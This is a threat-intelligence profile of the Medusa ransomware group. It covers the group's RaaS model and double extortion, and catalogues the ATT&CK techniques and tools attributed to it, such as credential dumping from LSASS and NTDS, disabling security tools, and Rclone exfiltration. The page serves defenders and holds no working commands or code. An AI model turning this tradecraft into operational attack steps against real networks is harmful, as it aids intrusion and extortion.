← threatfilter.dev / all groups / Medusa Group
Medusa Group
Overview
Medusa Group has been active since at least 2021 and was initially operated as a closed ransomware group before evolving into a Ransomware-as-a-Service (RaaS) operation. Some reporting indicates that certain attacks may still be conducted directly by the ransomware’s core developers. Public sources have also referred to the group as “Spearwing” or “Medusa Actors.” Medusa Group employs living-off-the-land techniques, frequently leveraging publicly available tools and common remote management software to conduct operations. The group engages in double extortion tactics, exfiltrating data prior to encryption and threatening to publish stolen information if ransom demands are not met. For initial access, Medusa Group has exploited publicly known vulnerabilities, conducted phishing campaigns, and used credentials or access purchased from Initial Access Brokers (IABs). The group is opportunistic and has targeted a wide range of sectors globally.
Capabilities
- Exploitation of public-facing / client applications — ATT&CK T1190
TTPs — 57 techniques across 13 tactics
Resource Development
-
T1583.006Web Services -
T1585.001Social Media Accounts -
T1585.002Email Accounts -
T1588.002Tool -
T1608.002Upload Tool -
T1650Acquire Access
Initial Access
Execution
-
T1047Windows Management Instrumentation -
T1059.001PowerShell -
T1059.003Windows Command Shell -
T1072Software Deployment Tools -
T1106Native API -
T1559.001Component Object Model -
T1569.002Service Execution
Persistence
-
T1136.002Domain Account -
T1505.003Web Shell -
T1543.003Windows Service
Privilege Escalation
-
T1548.002Bypass User Account Control
Stealth
-
T1027.002Software Packing -
T1027.010Command Obfuscation -
T1070.003Clear Command History -
T1070.004File Deletion -
T1078Valid Accounts -
T1218.014MMC -
T1564.003Hidden Window
Defense Impairment
-
T1112Modify Registry -
T1553.002Code Signing -
T1685Disable or Modify Tools -
T1686Disable or Modify System Firewall -
T1690Prevent Command History Logging
Credential Access
-
T1003.001LSASS Memory -
T1003.003NTDS
Discovery
-
T1016System Network Configuration Discovery -
T1018Remote System Discovery -
T1033System Owner/User Discovery -
T1046Network Service Discovery -
T1057Process Discovery -
T1069.002Domain Groups -
T1082System Information Discovery -
T1083File and Directory Discovery -
T1087.001Local Account -
T1135Network Share Discovery -
T1518.001Security Software Discovery -
T1652Device Driver Discovery
Lateral Movement
-
T1021.001Remote Desktop Protocol -
T1570Lateral Tool Transfer
Command and Control
-
T1071.001Web Protocols -
T1090.003Multi-hop Proxy -
T1105Ingress Tool Transfer -
T1219Remote Access Tools -
T1573.002Asymmetric Cryptography
Exfiltration
-
T1567.002Exfiltration to Cloud Storage
Impact
-
T1486Data Encrypted for Impact -
T1489Service Stop -
T1490Inhibit System Recovery -
T1529System Shutdown/Reboot -
T1657Financial Theft
Tools & malware (5)
certutil · Rclone · Medusa Ransomware · Mimikatz · PsExec
Reporting (3)
- Threat hunting case study: Medusa ransomware — Intel471
- AA25-071A #StopRansomware: Medusa Ransomware — Cybersecurity and Infrastructure Security Agency
- Medusa Ransomware Activity Continues to Increase — Threat Hunter Team Symantec and Carbon Black